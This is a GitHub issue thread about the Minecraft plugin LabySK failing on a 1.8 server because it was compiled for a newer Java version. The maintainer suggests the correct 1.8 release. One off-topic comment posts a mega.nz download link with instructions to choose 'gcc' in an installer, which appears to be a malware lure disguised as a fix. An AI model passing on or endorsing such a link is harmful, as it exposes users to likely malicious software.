### ISSUE TITLE
1.8 LabySK

### ISSUE THREAD

**Issue by Kan0Ka** [pqtriick/LabySK#3]
I get the following error when i try downloading and using the labysk for 1.8

[12:53:14] [Server thread/ERROR]: Could not load 'plugins/LabySK-2.0.2 (1).jar' in folder 'plugins'
org.bukkit.plugin.InvalidPluginException: java.lang.UnsupportedClassVersionError: de/pqtriick/labysk/LabySK has been compiled by a more recent version of the Java Runtime (class file version 64.0), this version of the Java Runtime only recognizes class file versions up to 52.0
	at org.bukkit.plugin.java.JavaPluginLoader.loadPlugin(JavaPluginLoader.java:133) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	at org.bukkit.plugin.SimplePluginManager.loadPlugin(SimplePluginManager.java:331) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	at org.bukkit.plugin.SimplePluginManager.loadPlugins(SimplePluginManager.java:254) [patched_1.8.8.jar:git-PaperSpigot-445]
	at org.bukkit.craftbukkit.v1_8_R3.CraftServer.loadPlugins(CraftServer.java:293) [patched_1.8.8.jar:git-PaperSpigot-445]
	at net.minecraft.server.v1_8_R3.DedicatedServer.init(DedicatedServer.java:202) [patched_1.8.8.jar:git-PaperSpigot-445]
	at net.minecraft.server.v1_8_R3.MinecraftServer.run(MinecraftServer.java:563) [patched_1.8.8.jar:git-PaperSpigot-445]
	at java.lang.Thread.run(Thread.java:750) [?:1.8.0_412]
Caused by: java.lang.UnsupportedClassVersionError: de/pqtriick/labysk/LabySK has been compiled by a more recent version of the Java Runtime (class file version 64.0), this version of the Java Runtime only recognizes class file versions up to 52.0
	at java.lang.ClassLoader.defineClass1(Native Method) ~[?:1.8.0_412]
	at java.lang.ClassLoader.defineClass(ClassLoader.java:756) ~[?:1.8.0_412]
	at java.security.SecureClassLoader.defineClass(SecureClassLoader.java:142) ~[?:1.8.0_412]
	at java.net.URLClassLoader.defineClass(URLClassLoader.java:473) ~[?:1.8.0_412]
	at java.net.URLClassLoader.access$100(URLClassLoader.java:74) ~[?:1.8.0_412]
	at java.net.URLClassLoader$1.run(URLClassLoader.java:369) ~[?:1.8.0_412]
	at java.net.URLClassLoader$1.run(URLClassLoader.java:363) ~[?:1.8.0_412]
	at java.security.AccessController.doPrivileged(Native Method) ~[?:1.8.0_412]
	at java.net.URLClassLoader.findClass(URLClassLoader.java:362) ~[?:1.8.0_412]
	at org.bukkit.plugin.java.PluginClassLoader.findClass(PluginClassLoader.java:102) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	at org.bukkit.plugin.java.PluginClassLoader.findClass(PluginClassLoader.java:87) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	at java.lang.ClassLoader.loadClass(ClassLoader.java:418) ~[?:1.8.0_412]
	at java.lang.ClassLoader.loadClass(ClassLoader.java:351) ~[?:1.8.0_412]
	at java.lang.Class.forName0(Native Method) ~[?:1.8.0_412]
	at java.lang.Class.forName(Class.java:348) ~[?:1.8.0_412]
	at org.bukkit.plugin.java.PluginClassLoader.<init>(PluginClassLoader.java:65) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	at org.bukkit.plugin.java.JavaPluginLoader.loadPlugin(JavaPluginLoader.java:129) ~[patched_1.8.8.jar:git-PaperSpigot-445]
	... 6 more

**Comment by esttemanb** [comment]
Download 
https://mega.nz/file/UYhhgZTR#EfgMGXyZlKeqZatw9ALTKS9JBu-qXLHYQli_2jXDCWU
In the installer menu, select "gcc."

**Comment by pqtriick** [comment]
Hey, which server version are you using?

**Comment by Kan0Ka** [comment]
1.8.9 i think

**Comment by pqtriick** [comment]
Have you also downloaded the 1.8 jar here on github? Becuase the one on SpigotMC ist for 1.20.4

**Comment by Kan0Ka** [comment]
my server is 1.8 i can send a screenshot of /ver when i get on

**Comment by pqtriick** [comment]
Okay your server is 1.8 **but did you also Download the 1.8 Version of LabySK from Github ([here](https://github.com/pqtriick/LabySK/releases/tag/mcv_1.8.8))**

**Comment by pqtriick** [comment]
Do you still have an error @Kan0Ka ?

**Comment by Kan0Ka** [comment]
Oh sorry, i haven't been on my computer for some time, but yes. It still doesn't work and i don't know what server jar im using actually since it's just the one i got with my hosting provider

**Comment by Kan0Ka** [comment]
But i can try putting a different one on mby

**Comment by pqtriick** [comment]
Do you have discord? If yes add me **pqtriick** maybe we can figure out your problem there
